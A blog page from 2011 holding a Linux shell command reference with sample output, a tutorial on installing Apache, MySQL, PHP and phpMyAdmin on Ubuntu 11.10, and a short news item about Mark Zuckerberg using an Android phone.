copy_of_lorem.txt  lorem.txt  moo.txt  www

du

Estimate file space usage.
$ du -h /bin
7.8M    /bin

echo

Display a line of text.
$ echo foobar
foobar

exit

Cause the shell to exit.
$ exit

fgrep

Print lines matching a pattern in a file.
$ fgrep "irure dolor" lorem.txt
commodo consequat. Duis aute irure dolor in reprehenderit in voluptate

find

Search for files in a directory hierarchy.
$ find hello*
hello_world
hello_world.c

free

Display amount of free and used memory in the system.
$ free
             total       used       free     shared    buffers     cached
Mem:       8299892    8287708      12184          0    2641772    1731236
Low:       3581300    3572764       8536
High:      4718592    4714944       3648
-/+ buffers/cache:    3914700    4385192
Swap:      8193140    2335664    5857476

grep

Print lines matching a pattern.
$ grep -i apple fruitlist.txt
apple

groups

Outputs the user groups of which your account belongs to.
$ groups
games users

head

Output the first part of files.
$ head -2 lorem.txt
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim

hostname

Outputs the machines hostname on the network.
$ hostname
anapnea.net

id

Outputs user id, group id, and groups of your account.
$ id
uid=1478(smallfoot) gid=100(users) groups=35(games),100(users)

kill

End a process.
$ kill -9 18298
-bash: kill: (18298) - Operation not permitted

killall

Kill processes by name.
$ killall irssi
irssi(18298): Operation not permitted
irssi(13372): Operation not permitted
irssi(22048): Operation not permitted
irssi: no process killed

last

Show listing of last logged in users.
$ last -n 3
alice    pts/6        192.0.34.166     Fri May 18 16:17   still logged in
bob      pts/2        64.233.183.103   Fri May 18 16:17   still logged in
clare    pts/6        72.5.124.61      Fri May 18 15:54 - 15:55  (00:01)

ldd

Print shared library dependencies.
$ ldd /bin/bash
        libncurses.so.5 => /lib/libncurses.so.5 (0x40023000)
        libdl.so.2 => /lib/libdl.so.2 (0x40065000)
        libc.so.6 => /lib/libc.so.6 (0x40069000)
        /lib/ld-linux.so.2 (0x40000000)

ln

Make links between files.
$ ln -s data.txt symlink.txt

logname

Print user's login name.
$ logname
smallfoot

ls

List directory contents.
$ ls
copy_of_lorem.txt  lorem.txt  moo.txt  www

man

Opens the manual page for a software or function.
$ man bash

md5sum

Outputs the MD5 hash sum of a file.
$ md5sum lorem.txt
56da9e37259af34345895883e6fd1a27  lorem.txt

mkdir

Makes a directory.
$ mkdir foobar

mv

Moves a file.
$ mv lorem.txt ipsum.txt

nl

Number lines of files.


$ nl lorem.txt
     1  Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
     2  tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim
     3  veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea
     4  commodo consequat. Duis aute irure dolor in reprehenderit in voluptate
     5  velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint
     6  occaecat cupidatat non proident, sunt in culpa qui officia deserunt
     7  mollit anim id est laborum.

nm

List symbols from object files.
$ nm hello_world
080494a0 D _DYNAMIC
0804956c D _GLOBAL_OFFSET_TABLE_
08048474 R _IO_stdin_used
         w _Jv_RegisterClasses
08049490 d __CTOR_END__
0804948c d __CTOR_LIST__
08049498 d __DTOR_END__
...

od

Dump files in octal and other formats.
$ od -t x /bin/sh
2376640 00098020 000054d4 00000000 00000000
2376660 00000020 00000000 000000c7 00000008
2376700 00000003 080e6500 0009d4f4 00004ae8
...

pidof

Find the process ID of a running program.
$ pidof fetchmail
22392

ping

Pings a host.
$ ping -c 2 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.048 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.052 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.048/0.050/0.052/0.002 ms

ps

Outputs running processes.
$ ps
  PID TTY          TIME CMD
21542 pts/12   00:00:00 bash
27706 pts/12   00:00:00 ps

pstree

Display a tree of processes.
$ pstree
init-+-2*[BitchX]
     |-3*[bash---sleep]
     |-fetchmail
     |-screen-+-bash---irssi
     |        `-bash---ctorrent
     |-screen-+-bash---lisp.run
     |        |-bash---vi
     |        |-2*[bash]
     |        `-bash---lynx
     |-2*[screen---bash---irssi]
     |-screen---irssi
     |-screen---bash
     |-screen-+-bash
     |        `-irssi
     |-skjerm---irssi
     |-sshd-+-5*[sshd---sshd---bash---irssi]
     |      |-8*[sshd---sshd---bash]
     |      |-sshd---sshd---bash---screen
     |      |-sshd---sshd
     |      `-sshd---sshd---bash---pstree
     `-syslog-ng

pwd

Outputs the name of current working directory.
$ pwd
/home/smallfoot

rm

Removes a file or directory.
$ rm lorem.txt

rmdir

Removes a directory.
$ rmdir foobar

sed

Stream editor for filtering and transforming text.
$ echo "My cat's name is Bob" | sed -e 's/Bob/Mittens/g'
My cat's name is Mittens

sha1sum

Outputs the SHA1 hash sum of a file.
$ sha1sum lorem.txt
c942ddebd142ec8bacac9213d48096e74bab4957  lorem.txt

shutdown

Bring the system down in a secure way. All logged-in users are notified that the system is going down.
$ shutdown now

size

List section sizes and total size.
$ size /bin/bash
   text    data     bss     dec     hex filename
 621233   22712   19176  663121   a1e51 /bin/bash

stat

Outputs file status.
$ stat lorem.txt
  File: `lorem.txt'
  Size: 453             Blocks: 8          IO Block: 4096   regular file
Device: 77h/119d        Inode: 27312217    Links: 1
Access: (0644/-rw-r--r--)  Uid: ( 1478/smallfoot)   Gid: (  100/   users)
Access: 2007-03-03 12:24:39.000000000 +0000
Modify: 2007-03-03 12:24:39.000000000 +0000
Change: 2007-03-03 12:24:39.000000000 +0000

strings

Print the strings of printable characters in files.
$ strings hello_world
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
puts
_IO_stdin_used
__libc_start_main
GLIBC_2.0
PTRh%
[^_]
Hello World!

tail

Output the last part of files.
$ tail -2 lorem.txt
occaecat cupidatat non proident, sunt in culpa qui officia deserunt
mollit anim id est laborum.

talk

Talk to another user.
$ talk bob Lookout for the dopefish!

touch

Change a file's access and modification timestamps. If file does not exist, create it.
$ touch lorem.txt

tty

Outputs the name of the current terminal.
$ tty
/dev/pts/16

uname

Outputs operating system, hostname, kernel version, date and timp, and processor.
$ uname -a
Linux anapnea.net 2.6.9 #1 SMP Wed Jul 19 16:24:18 MSD 2006 i686 Intel(R) Xeon(TM) CPU 2.80GHz GenuineIntel GNU/Linux

uptime

Outputs the system uptime.
$ uptime
 14:50:26 up 7 days, 17:52, 18 users,  load average: 0.08, 0.02, 0.01

users

Print the user names of users currently logged in to the current host.
$ users
alice bob charlie eve

vdir

List directory contents.
$ vdir
total 8
-rw-r--r-- 1 smallfoot users 453 Mar  3 12:32 copy_of_lorem.txt
-rw-r--r-- 1 smallfoot users 453 Mar  3 12:24 lorem.txt
-rw-r--r-- 1 smallfoot users   0 Mar  3 12:32 moo.txt
lrwxr-xr-x 1 root      root   18 Feb 27 19:33 www -> /var/www/smallfoot

w

Show who is logged on and what they are doing.
$ w
 12:14:30 up 5 days, 15:16, 19 users,  load average: 0.00, 0.00, 0.00
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
charlie  pts/0     Fri21    3:26m  2.52s  2.52s irssi
alice    pts/2     Wed17   30:21m  0.00s  0.00s -bash
emma     pts/4     11:37   36:57   0.00s  0.00s -bash
frank    pts/5     11:48   11:03   0.00s  0.00s -bash
smallfoo pts/12    12:01    0.00s  0.04s  0.01s w

wall

Send a message to everybody's terminal.
$ wall next week we change the server for a new one

wc

Counts lines in a file.
$ wc -l lorem.txt
7 lorem.txt

whatis

Search the whatis database for complete words.
$ whatis bash
bash                 (1)  - GNU Bourne-Again SHell
bash [builtins]      (1)  - bash built-in commands, see bash(1)

who

Outputs who is currently logged into the system.
$ who
charlie  pts/0        Mar  2 21:37 (xtreme-11-65.acme.com)
alice    pts/2        Feb 28 17:48 (147.21.16.3)
emma     pts/4        Mar  3 11:37 (32.84-48-181.uac.com)
frank    pts/5        Mar  3 11:48 (port-212-202-233-2.foobar.org)
smallfoot pts/12       Mar  3 12:01 (c-12776f4.cust.example.net)

whereis

Locate the binary, source, and manual page files for a command.
$ whereis bash
bash: /bin/bash /etc/bash /usr/share/man/man1/bash.1.gz

whoami

Outputs your username / the name of your account.
$ whoami
smallfoot
Read More

INSTALLING LAMP on Ubuntu 11.xx Tutorial

Friday, October 21, 2011  h4ckfreak  No comments


LAMP is short for Linux, Apache, MySQL, PHP. This tutorial shows how you can install an Apache2 webserver on an Ubuntu 11.10 server with PHP5 support (mod_php) and MySQL support.
I do not issue any guarantee that this will work for you!

1 Preliminary Note

In this tutorial I use the hostname server1.example.com with the IP address 192.168.0.23. These settings might differ for you, so you have to replace them where appropriate.
I'm running all the steps in this tutorial with root privileges, so make sure you're logged in as root:
sudo su

2 Installing MySQL 5

First we install MySQL 5 like this:
apt-get install mysql-server mysql-client
You will be asked to provide a password for the MySQL root user - this password is valid for the user root@localhost as well as root@server1.example.com, so we don't have to specify a MySQL root password manually later on:
New password for the MySQL "root" user: <-- yourrootsqlpassword
Repeat password for the MySQL "root" user: <-- yourrootsqlpassword



3 Installing Apache2

Apache2 is available as an Ubuntu package, therefore we can install it like this:
apt-get install apache2
Now direct your browser to http://192.168.0.23, and you should see the Apache2 placeholder page (It works!):




Apache's default document root is /var/www on Ubuntu, and the configuration file is /etc/apache2/apache2.conf. Additional configurations are stored in subdirectories of the /etc/apache2 directory such as /etc/apache2/mods-enabled (for Apache modules), /etc/apache2/sites-enabled (for virtual hosts), and /etc/apache2/conf.d.

4 Installing PHP5

We can install PHP5 and the Apache PHP5 module as follows:
apt-get install php5 libapache2-mod-php5
We must restart Apache afterwards:
/etc/init.d/apache2 restart



5 Testing PHP5 / Getting Details About Your PHP5 Installation

 

 

The document root of the default web site is /var/www. We will now create a small PHP file (info.php) in that directory and call it in a browser. The file will display lots of useful details about our PHP installation, such as the installed PHP version.
vi /var/www/info.php


Now we call that file in a browser (e.g. http://192.168.0.23/info.php):
Click Image to Enlarge 

As you see, PHP5 is working, and it's working through the Apache 2.0 Handler, as shown in the Server API line. If you scroll further down, you will see all modules that are already enabled in PHP5. MySQL is not listed there which means we don't have MySQL support in PHP5 yet.

6 Getting MySQL Support In PHP5

To get MySQL support in PHP, we can install the php5-mysql package. It's a good idea to install some other PHP5 modules as well as you might need them for your applications. You can search for available PHP5 modules like this:
apt-cache search php5
Pick the ones you need and install them like this:
apt-get install php5-mysql php5-curl php5-gd php5-idn php-pear php5-imagick php5-imap php5-mcrypt php5-memcache php5-ming php5-ps php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl
Now restart Apache2:
/etc/init.d/apache2 restart




Now reload http://192.168.0.23/info.php in your browser and scroll down to the modules section again. You should now find lots of new modules there, including the MySQL module:


7 phpMyAdmin

phpMyAdmin is a web interface through which you can manage your MySQL databases. It's a good idea to install it:
apt-get install phpmyadmin
You will see the following questions:
Web server to reconfigure automatically: <-- apache2
Configure database for phpmyadmin with dbconfig-common? <-- No
Afterwards, you can access phpMyAdmin under http://192.168.0.23/phpmyadmin/:




iF U HAVE FURTHER Doubts , Refere the below links thanks







 


Read More

Monday, October 17, 2011

Mark Zuckerberg Uses Android Phone Finally

Monday, October 17, 2011  h4ckfreak  No comments

If his recent Facebook activity has to be believed, than Facebook’s founder and CEO might have just ditched his iPhone for Android. It was only last month when Mark made the headlines for switching to iPhone (it was 3GS, not iPhone 4) from BlackBerry. But the experience wasn’t all that great as he posted about his frustrations with the device, citing poor battery life, and phone calling quality. He also said that he will get the new iPhone 4 and see if that solves all his problems before switching to Android.
Facebook Zuckerberg on iPhoneMark Zuckerberg Profile on Facebook, June 2010
And now according to his recent Facebook activity, it looks like he has finally gone for an Android phone.
Mark ZuckerbergMark Zuckerberg Profile on Facebook, July 2011
But given the amount of revenues that he generates from the most popular social networking site, I wouldn’t be surprised if he keeps both the iPhone 4 and an Android phone to fulfill all his needs.
Oh and now that Zuckerberg is using an Android phone, we may finally see an update for Facebook for Android app which badly needs to get updated to come on-par with the iPhone version.
Read More